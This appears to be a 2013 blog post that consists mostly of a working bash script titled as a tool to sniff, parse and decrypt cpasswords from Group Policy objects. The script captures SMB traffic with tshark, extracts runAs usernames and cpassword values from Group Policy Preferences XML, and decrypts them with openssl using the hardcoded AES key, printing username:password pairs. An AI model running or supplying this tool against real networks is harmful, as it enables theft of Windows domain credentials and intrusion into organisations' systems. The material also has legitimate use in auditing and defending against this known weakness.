parse_username(){ echo -n "$1" | grep -o -P 'runAs=".*?"'| cut -d'"' -f 2 } parse_cpassword(){ echo -n "$1" | grep -o -P 'cpassword=".*?"'| cut -d'"' -f 2 } decrypt_cpassword(){ cpassword="$1" pad_length=$(expr 4 - length "${cpassword}" % 4) # figure out the padding length padding=$(for i in {1..${pad_length}}; do printf =; done) #output correct padding string #pad, b64 decode, then decrypt the password echo $(echo -n ${cpassword}${padding} | base64 -d | openssl aes-256-cbc -d -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv '') } tshark -R 'smb.cmd==0x2e and tcp contains 'cpassword'' -Tfields -e smb.file_data \ | xxd -r -p | grep cpassword \ | while read line; do \ echo $(parse_username "$line"):$(decrypt_cpassword $(parse_cpassword "$line")); done
Sunday, March 3, 2013
Bash script to sniff, parse, and decrypt cpassword's from GPOs
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment